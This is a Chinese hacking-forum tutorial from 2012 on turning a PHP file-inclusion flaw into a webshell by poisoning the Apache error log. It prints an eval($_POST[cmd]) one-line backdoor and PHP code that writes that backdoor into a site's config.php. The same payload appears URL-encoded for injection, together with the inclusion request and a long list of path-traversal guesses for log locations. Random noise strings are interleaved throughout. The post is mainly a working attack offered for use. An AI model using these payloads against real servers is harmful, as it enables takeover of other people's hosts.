中国网络渗透测试联盟
标题:
php包含apache日志写马
[打印本页]
作者:
admin
时间:
2012-9-15 14:27
标题:
php包含apache日志写马
因为上面那个很不实际,我在测试中发现日志动不动就是几十兆,那样玩起来也没意思了。下面想的再深入一点也就是我们写入一个很实际的webshell来用,也比上面那种慢的要死好很多。
% f) D5 g: q+ z# V
. ]* o, c& ?1 B" y3 r1 C
比如还是这句一句话木马
5 z1 m3 l" C) r& c) J# I
<?eval($_POST[cmd]);?>
( y" ?' ^5 J+ a4 L/ y* n4 X) U2 U: F6 J
" j5 Y+ s: }0 \& b, d" j) i4 O
到这里你也许就想到了,这是个很不错的办法。接着看,如何写入就成了个问题,用这句,
" M# i8 c7 T. S9 k8 n7 c) ]+ G, s: r
fopen打开/home/virtual/www.xxx.com/forum/config.php这个文件,然后写入<?eval($_POST[cmd]);?>这个一句话木马服务端语句。连起来表达成php语句就是
7 S, d/ p8 J- C/ j+ B5 t$ n
8 Q9 a9 {. D4 P, q& q
<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>");
+ k) n' W9 B/ z2 o: C$ W& N
fclose($fp);?> //在config.php里写入一句木马语句
- Y" C% l9 Z* q2 B$ K
* P: s+ \" P; B1 D8 Q& Q- }1 i
我们提交这句,再让Apache记录到错误日志里,再包含就成功写入shell,记得一定要转换成URL格式才成功。
, L& O/ n) H, `7 O
转换为
7 I% n# h$ \: g6 c" {
%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2F
' R `' n F: o2 l
config%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp
5 ~- \+ `( k! n
%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3B
$ g8 K' w1 G" a# X) W$ }8 y
fclose%28%24fp%29%3B%3F%3E
! ?% M; y7 o7 p* L" o
我们提交
9 d @$ J3 q" p2 a" ]
http://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww
1 y1 d( u: T. u$ _# a1 }
%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp
/ A d' U: R" d! l6 B: }# P
%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5B
8 y3 e9 }. C2 E: E7 @) [! R
cmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E
4 Z6 t* [, J! @+ F- M
" f2 \9 {2 T5 B. z$ f, G6 Q# n
这样就错误日志里就记录下了这行写入webshell的代码。
. J) z8 b4 j# j% U, O4 i
我们再来包含日志,提交
; Q$ s8 B- A7 n4 k4 W7 g( y' Z
http://xxx.com/z.php?zizzy=/home
... /logs/www-error_log
1 @7 K, S% f; e8 T- l( W4 q4 C
$ D' M. R, N$ @' A, z6 l
这样webshell就写入成功了,config.php里就写入一句木马语句
3 |0 H* A/ h4 s& |( \
OK.
/ z" q: U& L+ [3 k# ~6 p
http://www.xxx.com/forum/config.php
这个就成了我们的webshell
9 E& s1 Z6 c ^- A+ z$ z" W
直接用lanker的客户端一连,主机就是你的了。
7 o1 A5 T9 c" g4 S1 n
0 y& ]9 q( g# F% v% |6 d% L- Z
PS:上面讲的,前提是文件夹权限必须可写 ,一定要-rwxrwxrwx(777)才能继续,这里直接用上面列出的目录来查看。上面讲的都是在知道日志路径的情况下的利用
0 @2 i) b1 X( G3 I
7 t$ G! m' S9 D, _# _* H3 _
其他的日志路径,你可以去猜,也可以参照这里。
' p: D) r% P; `9 X# N: m7 N
../../../../../../../../../../var/log/httpd/access_log
7 j. _6 A \+ C Z3 |
../../../../../../../../../../var/log/httpd/error_log
. G/ o# L1 B7 D( I; I% c( S
../apache/logs/error.log
3 Z' z! z1 l4 i ]/ u0 e
../apache/logs/access.log
" P& i$ @2 q5 g3 q
../../apache/logs/error.log
' U6 s2 m9 c1 Q0 [* N( B( j( |# c
../../apache/logs/access.log
. |: ]; _' C7 g6 E( }
../../../apache/logs/error.log
: {3 r2 n0 J9 M6 ^% }
../../../apache/logs/access.log
; J, z0 E! _4 \4 E
../../../../../../../../../../etc/httpd/logs/acces_log
. H5 G( }, _* y) q# }
../../../../../../../../../../etc/httpd/logs/acces.log
) H' G( L5 }; q
../../../../../../../../../../etc/httpd/logs/error_log
# U/ p; l0 G% E. l
../../../../../../../../../../etc/httpd/logs/error.log
5 I; u0 a$ k7 N6 @
../../../../../../../../../../var/www/logs/access_log
& W/ C& S# B. D
../../../../../../../../../../var/www/logs/access.log
' h3 I1 `+ x1 V
../../../../../../../../../../usr/local/apache/logs/access_log
/ T" Q8 M" X2 H- n+ L
../../../../../../../../../../usr/local/apache/logs/access.log
h1 _' L& |0 Y3 q- f& M
../../../../../../../../../../var/log/apache/access_log
* ~5 J+ i: {' K' S9 g
../../../../../../../../../../var/log/apache/access.log
6 [) c3 P0 D4 }
../../../../../../../../../../var/log/access_log
* j! A: i7 e! Y$ k0 @+ Z
../../../../../../../../../../var/www/logs/error_log
( h0 `5 l, V% e. }1 \6 X1 M
../../../../../../../../../../var/www/logs/error.log
: e0 A7 ]: g& j
../../../../../../../../../../usr/local/apache/logs/error_log
( ?, [- J% z- e' S- H( r3 D: m
../../../../../../../../../../usr/local/apache/logs/error.log
) H; X% Z3 q, L7 d. A4 f4 \) e
../../../../../../../../../../var/log/apache/error_log
5 J: k& W* o- e5 R, z1 ^( g
../../../../../../../../../../var/log/apache/error.log
3 z0 K9 u! y1 ?5 L
../../../../../../../../../../var/log/access_log
8 u5 t* @* x# O/ H4 J/ r
../../../../../../../../../../var/log/error_log
0 D5 z4 |& q9 U7 |
/var/log/httpd/access_log
8 }( ?% F3 G( j, J8 U/ ~# l
/var/log/httpd/error_log
6 x( o) }/ ]+ L$ E& h3 ~
../apache/logs/error.log
' h3 b2 c$ ? a( w7 f
../apache/logs/access.log
- _6 [' T Q2 @' s
../../apache/logs/error.log
' D3 ^1 w& M+ A ?0 p
../../apache/logs/access.log
2 c! m7 v9 K/ [$ K9 N
../../../apache/logs/error.log
! X4 u& g; I; W1 z
../../../apache/logs/access.log
- @" h2 \7 C8 ^( K
/etc/httpd/logs/acces_log
# k% {9 G* M: K3 t$ E
/etc/httpd/logs/acces.log
3 ?8 U" q8 y$ V: h0 Y: p; {
/etc/httpd/logs/error_log
+ m: y( C4 K$ t5 ?" D$ M# m; i' f
/etc/httpd/logs/error.log
+ M2 }4 [: g$ x7 Z
/var/www/logs/access_log
3 o) q4 `1 A$ {+ K; N E
/var/www/logs/access.log
: b# a2 d- y9 w1 r/ {
/usr/local/apache/logs/access_log
+ `2 R' A' F$ _& [
/usr/local/apache/logs/access.log
; R3 U* g+ k8 F; a& R; H! N
/var/log/apache/access_log
4 n- U" {& t+ C1 Q
/var/log/apache/access.log
! D5 T9 F6 E M
/var/log/access_log
! O* z' b* o) c: y. Q. @4 K
/var/www/logs/error_log
- Z: O6 @' ~3 D" f0 R# }
/var/www/logs/error.log
b, q4 \8 V9 r
/usr/local/apache/logs/error_log
1 e8 I* b4 W- s
/usr/local/apache/logs/error.log
6 c' s5 [, ~0 T9 s( e$ d# Y
/var/log/apache/error_log
( Z2 T" I8 U0 n5 K r
/var/log/apache/error.log
K) K# G# e# C* A7 z, _4 C1 Z3 ?
/var/log/access_log
: j' M6 }: @2 v# Y+ `- U3 e
/var/log/error_log
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2